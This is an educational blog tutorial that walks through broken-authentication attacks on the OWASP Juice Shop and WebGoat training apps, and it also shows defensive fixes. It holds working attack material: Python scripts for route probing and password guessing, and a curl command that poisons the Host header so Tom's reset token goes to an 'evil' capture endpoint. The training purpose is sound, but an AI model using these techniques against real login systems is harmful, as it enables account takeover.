
Broken Authentication and Session Management tutorial

April 22, 2021 by thehackerish

Hello and welcome to this new episode of the OWASP Top 10 training series. In this Broken Authentication and Session Management tutorial, you will put your knowledge into action on hands-on attack examples. If you don’t know the theory behind this vulnerability, I highly recommend you read it first and then come back.

In this Broken Authentication and Session Management tutorial, you will learn:

  • Authentication bypass attack example using forced browsing
  • Exploit Broken Authentication using Weak credentials
  • Broken Authentication and Session Management attacks example using a vulnerable password reset link
  • Exploit Broken Authentication using a security question

Authentication bypass attack example using forced browsing

In this example, your goal is to access the challenge board on OWASP Juice Shop, which is not meant to be public. Single Page Applications (SPA) render their pages client-side and talk to the back-end through Ajax/REST calls. Therefore, every route and API endpoint the application uses has to be shipped to the browser somewhere, typically in the minified JavaScript bundle. Anyone can read that bundle, so hiding a page by simply not linking to it is no protection at all: this is forced browsing.

  1. Firstly, open Chrome Browser and visit Juice Shop
  2. Then, right-click on the page and choose Inspect
  3. Under the Sources tab, choose the main-es2015.js file and beautify it using the {} button at the bottom of the window which shows the minified JavaScript file.
  4. Then, locate the part where endpoints are declared using Ctrl+F on Windows or Command+F on Mac (for example, search for the string path:)
  5. From the list, you can see the score-board endpoint as shown below
Enumerating JS files using Chrome’s Dev Tools
  6. Go to the URL: http://192.168.99.100:3000/#/score-board
  7. Finally, you should see the scoreboard containing all the challenges.
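The manual search above scales badly once a bundle has hundreds of routes. The script below is an added example (not code from the original post) that automates the same idea: it pulls Angular route paths and /api/ or /rest/ endpoint literals out of a JavaScript bundle and can then probe the API paths without a session. The regular expressions assume the bundle shape Angular produces ({path:"..."} route objects and string-literal REST paths); the embedded SAMPLE_BUNDLE is a constructed stand-in for main-es2015.js, not a real Juice Shop build.

```python
"""Forced browsing from the client bundle: pull Angular route paths and API
endpoint literals out of a front-end JavaScript file, then probe the API ones
unauthenticated. Added example, not code from the original post."""
import re
from urllib.error import HTTPError, URLError
from urllib.parse import urljoin
from urllib.request import Request, urlopen

# Two patterns (assumed bundle shape): Angular routes appear as {path:"..."}
# objects, and REST calls carry string literals starting with /api/ or /rest/.
ROUTE_RE = re.compile(r'path\s*:\s*["\']([A-Za-z0-9_\-/:]*)["\']')
API_RE = re.compile(r'["\'](/(?:api|rest)/[A-Za-z0-9_\-/]+)["\']')


def extract_paths(bundle_js):
    """Return {'routes': [...], 'apis': [...]} found in the bundle text.
    The empty default route and the '**' wildcard are not worth visiting."""
    routes = {m for m in ROUTE_RE.findall(bundle_js) if m and m != "**"}
    apis = set(API_RE.findall(bundle_js))
    return {"routes": sorted(routes), "apis": sorted(apis)}


def probe_apis(base_url, api_paths, timeout=5):
    """GET each API path with no session cookie and record the status code.
    A 2xx on an endpoint the UI only exposes to admins is the finding. Hash
    routes such as /#/score-board are resolved client-side, so the server
    always answers them with the index page; those you check in the browser."""
    results = {}
    for path in api_paths:
        try:
            with urlopen(Request(urljoin(base_url, path)), timeout=timeout) as resp:
                results[path] = resp.status
        except HTTPError as err:
            results[path] = err.code
        except URLError:
            results[path] = None
    return results


# Constructed stand-in for a minified main-es2015.js; not a real Juice Shop build.
SAMPLE_BUNDLE = (
    'r=[{path:"",component:Qe},{path:"login",component:Pe},'
    '{path:"score-board",component:Xe},{path:"administration",component:Je},'
    '{path:"**",redirectTo:""}];'
    'this.http.get("/rest/admin/application-configuration");'
    'this.http.post("/api/Users",e)'
)

if __name__ == "__main__":
    found = extract_paths(SAMPLE_BUNDLE)
    print("client routes:", ["/#/" + r for r in found["routes"]])
    print("api endpoints:", found["apis"])
    # Against the live Juice Shop used in this tutorial:
    # print(probe_apis("http://192.168.99.100:3000/", found["apis"]))
```

Feed it the text of the real bundle (saved from the Sources tab or fetched with curl) and compare the routes it lists with the ones the navigation menu actually links to; anything in the first set but not the second, like score-board or administration, is a forced-browsing candidate.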

Exploit Broken Authentication using Weak credentials

Let’s try to log in as the admin user on OWASP Juice Shop. From our previous SQL injection tutorial, we know that the admin’s email is admin@juice-sh.op. So, let’s brute force his password using a dictionary of the 100 worst passwords.

Because Burp Suite Community Edition throttles Intruder attacks, we are going to use OWASP ZAP for this challenge. It is also a great opportunity to learn how to use OWASP ZAP in such a use case.

Capturing the vulnerable request on OWASP ZAP

  1. Firstly, make sure that OWASP ZAP is properly configured as your browser’s proxy, so that it records the traffic.
  2. Make sure that you have OWASP Juice Shop running.
  3. On the Juice Shop top menu, click on the Account button, then on the Login button.
OWASP Juice Shop Login feature
  4. Then, enter admin@juice-sh.op in the email and a dummy password, and hit enter.
  5. You should see a POST request coming through Zaproxy’s History tab.
OWASP ZAP HTTP capture
  6. As you can see, the response code is 401, which means that our authentication has failed.
  7. On the Request view, you can see the full POST request, including the POST data.
OWASP ZAP showing the vulnerable login request

Brute force the admin password

  1. Now, right-click on the request, and choose the Fuzz option.
Fuzz option in the OWASP ZAP contextual menu
  2. Then, select the password value in the POST data of the login request and click on the Add button on the right.
OWASP ZAP Fuzz menu
  3. Make sure that the payload type is Strings. Then, copy and paste the list of passwords from the password dictionary and hit OK.
Login dictionary to test for Broken Authentication
  4. Finally, run the fuzzer; a new tab named Fuzzer appears. After a while, the fuzzing finishes. Sort the results by status code: every wrong password returns 401, and a single request returns 200, for the password admin123. That is the admin’s password.
Broken Authentication and Session Management tutorial: Password found
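The ZAP fuzzer is doing nothing more than replaying the login request with a different password each time and watching the status code. The script below is an added example (not code from the original post) that does the same from the command line and, unlike a blind fuzz, stops and reports when the server starts answering 423 or 429, which is the lockout or rate-limiting response a correctly built login endpoint should send. The JSON request shape and the /rest/user/login path are assumed from the Juice Shop front end; WORST_PASSWORDS is a constructed slice of a wordlist, and the attempt parameter lets the guessing loop run against a fake responder offline.

```python
"""Online password guessing against a JSON login endpoint, the same test the
OWASP ZAP fuzzer performs above. Added example, not code from the original post;
the /rest/user/login request shape is assumed from Juice Shop's front end."""
import json
from urllib.error import HTTPError, URLError
from urllib.request import Request, urlopen

# Constructed slice of a "worst passwords" list; use a full wordlist for real tests.
WORST_PASSWORDS = ["123456", "password", "12345678", "qwerty", "admin", "admin123", "letmein"]


def http_login(url, email, password, timeout=5):
    """POST {"email": ..., "password": ...} and return the HTTP status code
    (200 on success, 401 on a wrong password; None if the server is unreachable)."""
    body = json.dumps({"email": email, "password": password}).encode()
    req = Request(url, data=body, method="POST",
                  headers={"Content-Type": "application/json"})
    try:
        with urlopen(req, timeout=timeout) as resp:
            return resp.status
    except HTTPError as err:
        return err.code
    except URLError:
        return None


def guess_password(url, email, candidates, attempt=http_login):
    """Try each candidate once and stop at the first 200.
    423/429 mean lockout or rate limiting: stop and report it instead of
    hammering on (and, from the defender's side, that response is the control
    whose absence makes this attack work)."""
    tried = 0
    for password in candidates:
        tried += 1
        status = attempt(url, email, password)
        if status == 200:
            return {"outcome": "found", "password": password, "attempts": tried}
        if status in (423, 429):
            return {"outcome": "blocked", "status": status, "attempts": tried}
    return {"outcome": "exhausted", "attempts": tried}


if __name__ == "__main__":
    result = guess_password("http://192.168.99.100:3000/rest/user/login",
                            "admin@juice-sh.op", WORST_PASSWORDS)
    print(result)
```

Against the tutorial's Juice Shop instance the loop reports the same admin123 hit the fuzzer found; against an application that locks the account or rate-limits the endpoint it returns "blocked" after a handful of attempts, which is the behaviour you want to see when you test your own login.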

Broken Authentication and Session Management attacks example using a vulnerable password reset link

In this challenge, your goal is to hijack Tom’s password reset link and takeover his account on OWASP WebGoat.

Capturing the vulnerable password reset request

  1. Firstly, make sure that you have OWASP WebGoat and WebWolf up and running.
  2. Then, go to the password reset challenge number 6, as shown below
Broken Authentication and Session Management tutorial
  3. Next, scroll down and notice that you have the ability to reset your account’s password using the forgot password feature.
Broken Authentication and Session Management tutorial: password reset form
  4. Then, in the History tab of OWASP ZAP, you can see a POST request as shown below
OWASP ZAP captured the password reset POST request
  5. The POST request looks like this:
Password reset POST request

Exploiting the Password Reset feature

  1. Now, note your Cookie header and the email POST data; we will use them to construct the following curl command (replace the JSESSIONID value with your own):
curl http://192.168.99.100:8080/WebGoat/PasswordReset/ForgotPassword/create-password-reset-link -H "Host: 192.168.99.100:9090/landing/evil" -b "JSESSIONID=Y-rAgt6BZhL5vY2yJaGH4Mx5ZPugPcK8WnwEd44Z" --data "email=tom%40webgoat-cloud.org"
  2. In the request above, the -H option adds our own HTTP header. In this case, we poisoned the HTTP Host header to point to 192.168.99.100:9090/landing/evil, because the application builds the password reset link from the Host header it receives. Tom’s reset link therefore points at WebWolf, and we can capture the request made to /landing/evil there. In a real-life situation, the Host header would point to a server controlled by the attacker. The -b option adds the cookie, and the --data option adds the POST data (Tom’s email, URL-encoded).
  3. After executing the curl command above, you can see that you get a request to WebWolf under the Incoming Requests menu, like the one below
WebWolf captured the password reset token
  4. We successfully hijacked Tom’s password reset token! Now we need the shape of a legitimate reset link to use it in. To see one, send a password reset request for your own account, which is <user>@webgoat-cloud.org. On WebWolf, you can receive incoming emails on the Mailbox tab from the top menu.
Password reset link structure
  5. As you can see, the password reset link looks like this: http://192.168.99.100:8080/WebGoat/PasswordReset/reset/reset-password/<password-reset-token>
  6. All we have to do now is substitute <password-reset-token> with the one we hijacked earlier and visit the web page. You should see a password reset form as shown below.
Broken Authentication and Session Management tutorial: Tom’s Password reset form
  7. Fill in whatever password you want, then log in as Tom using the new password.
Challenge solved! Successful Tom’s account takeover
  8. Congratulations! You have taken over Tom’s account through a password reset feature that trusts the Host header.
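To make the root cause concrete, here is an added example (not WebGoat’s code) that mimics the behaviour the challenge exposes: a reset-link builder that takes the host from the request’s Host header, next to a hardened version that only ever uses a configured origin, plus the attacker-side step of recovering the token from the path WebWolf receives. APP_ORIGIN and RESET_PATH are assumed from the URLs used in this tutorial; the random token generation is the practice a correct implementation should follow, not a description of WebGoat’s internals.

```python
"""Why the curl command above works: the application builds the reset link from
the client-supplied Host header, so the attacker chooses the host Tom's email
points to. Added example that mimics the challenge's behaviour; it is not
WebGoat's code. APP_ORIGIN and RESET_PATH are assumed from this tutorial's URLs."""
import secrets
from urllib.parse import urlsplit

APP_ORIGIN = "http://192.168.99.100:8080"          # configured canonical origin (assumed)
RESET_PATH = "/WebGoat/PasswordReset/reset/reset-password/"


def new_reset_token():
    """32 bytes from the OS CSPRNG, URL-safe; never derived from the user or the time."""
    return secrets.token_urlsafe(32)


def reset_link_vulnerable(request_headers, token):
    """The flaw: whoever sends the request picks the host in the victim's link."""
    host = request_headers.get("Host", "localhost")
    return "http://" + host + RESET_PATH + token


def is_trusted_host(request_headers):
    """Host header must equal the configured origin; a mismatch also flags a
    proxy misconfiguration worth logging."""
    return request_headers.get("Host", "") == urlsplit(APP_ORIGIN).netloc


def reset_link_hardened(request_headers, token):
    """The fix: ignore the Host header entirely and build from configuration."""
    if not is_trusted_host(request_headers):
        print("warning: unexpected Host header:", request_headers.get("Host"))
    return APP_ORIGIN + RESET_PATH + token


def harvest_token(captured_path):
    """Attacker side: the token is the last path segment of the request that
    lands on WebWolf, e.g. /landing/evil/WebGoat/PasswordReset/reset/reset-password/<token>."""
    return captured_path.rstrip("/").rsplit("/", 1)[-1]


if __name__ == "__main__":
    token = new_reset_token()
    evil_request = {"Host": "192.168.99.100:9090/landing/evil"}
    mailed = reset_link_vulnerable(evil_request, token)
    print("link mailed to Tom: ", mailed)                       # points at WebWolf
    print("attacker recovers:  ", harvest_token(urlsplit(mailed).path) == token)
    print("hardened link:      ", reset_link_hardened(evil_request, token))
```

The vulnerable builder is the whole bug: once the host comes from the request, every other part of the reset flow can be perfect and the token still leaks to the attacker when the victim clicks. The hardened builder makes the curl trick inert, because the link in Tom’s mailbox points at the real application no matter what Host the attacker sends.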

Exploit Broken Authentication using a security question

You might think that security questions are secret, but that’s not quite the case. With the amount of personal data people share on social media nowadays, security question answers can often be found with a little research. In this challenge, we are going to reset Bjoern’s password and access his account using a security answer he shared publicly.

In his talk, Bjoern shared that he owns a three-legged cat named Zaya. He used his email bjoern@owasp.org.

  1. Firstly, open the login form from the top menu.
  2. Then, choose the forgot your password option at the bottom of the login form.
  3. Finally, enter bjoern@owasp.org as the email, Zaya as the answer to the security question and a new password for Bjoern.
  4. Congratulations! You can authenticate as Bjoern in Juice Shop.
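The attack works because the answer is accepted in clear text, compared as a plain string, and can be tried as often as you like. The example below is added here and is not Juice Shop’s code; it shows how an application would have to treat a security answer for the same guess to be much less useful: normalise it, store only a salted slow hash, compare in constant time, and lock the question after a few misses. MAX_ATTEMPTS and the PBKDF2 cost are illustrative choices, and even this hardened form should only be a second check next to an emailed token, never the sole factor.

```python
"""Treating a security answer as a secret rather than a quiz: normalise it, hash
it with a slow KDF, compare in constant time, and lock the question after a few
misses so a publicly known fact such as a pet's name cannot be tried at will.
Added example, not Juice Shop's code; MAX_ATTEMPTS and the KDF cost are choices."""
import hashlib
import hmac
import os
import unicodedata

MAX_ATTEMPTS = 5
PBKDF2_ROUNDS = 100_000


def normalize(answer):
    """'  Zaya ' and 'zaya' are the same answer; accents and extra spaces dropped."""
    decomposed = unicodedata.normalize("NFKD", answer)
    stripped = "".join(c for c in decomposed if not unicodedata.combining(c))
    return " ".join(stripped.lower().split())


def hash_answer(answer, salt=None):
    """Return (salt, digest); store both, never the plaintext answer."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", normalize(answer).encode("utf-8"),
                                 salt, PBKDF2_ROUNDS)
    return salt, digest


class SecurityQuestionGate:
    """Per-account verifier. A correct answer after lockout still fails, so the
    attacker learns nothing by guessing past the limit. On its own this is still
    a weak factor: pair it with an emailed token, as a second check, not a replacement."""

    def __init__(self, salt, digest):
        self.salt = salt
        self.digest = digest
        self.failures = 0

    def locked(self):
        return self.failures >= MAX_ATTEMPTS

    def verify(self, answer):
        if self.locked():
            return False
        _, candidate = hash_answer(answer, self.salt)
        if hmac.compare_digest(candidate, self.digest):
            return True
        self.failures += 1
        return False


if __name__ == "__main__":
    gate = SecurityQuestionGate(*hash_answer("Zaya"))   # Bjoern's stored answer
    print(gate.verify(" zaya "))                        # normalised match
    for guess in ["Fluffy", "Rex", "Tom", "Kitty", "Max"]:
        gate.verify(guess)                              # five misses: locked
    print(gate.locked(), gate.verify("Zaya"))           # correct answer now rejected
```

Note what the lockout does and does not buy you: it stops online guessing of a short list of pet names, but it does nothing against an attacker who already knows the right answer from a conference talk. That is why the answer must be combined with possession of the mailbox, and why the Juice Shop flow, which resets the password on the answer alone, is broken by design.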

As you can see, there are many attack vectors against a broken authentication and session management implementation: unlinked pages, weak passwords, reset links built from attacker-controlled input, and guessable security answers. Hopefully, you’ve learned something new.

New content will be released in the future. If you enjoy learning on this blog, make sure to subscribe to the newsletter below. We will send you updates each Friday!



2 Comments

  1. WdPoker says:
    April 20, 2021 at 6:21 am

    Marvelous, what a web site it is! This blog presents helpful information to
    us, keep it up.

    1. thehackerish says:
      April 22, 2021 at 6:31 pm

      Many thanks! Enjoy reading and learning!

